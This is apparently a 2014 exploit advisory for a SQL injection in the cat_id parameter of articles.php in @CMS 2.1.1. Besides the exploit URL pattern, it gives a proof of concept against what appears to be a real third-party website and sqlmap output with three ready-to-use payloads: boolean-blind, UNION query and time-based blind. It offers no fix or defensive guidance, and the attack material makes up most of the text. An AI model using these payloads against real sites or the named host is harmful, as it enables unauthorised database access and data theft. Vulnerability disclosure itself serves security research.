# SQL Injection on @CMS 2.1.1 Stable
# Risk: High
# CWE number: CWE-89
# Date: 22/08/2014
# Vendor: www.atcode.net
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint
# Vulnerable File: articles.php
# Exploit: http://host/articles.php?cat_id=[SQLI]
# PoC: http://carla-coluXmna.de/articles.php?cat_id=[SQLI]
--- "SQLi using sqlmap."---
Place: GET
Parameter: cat_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs
---
# Thank's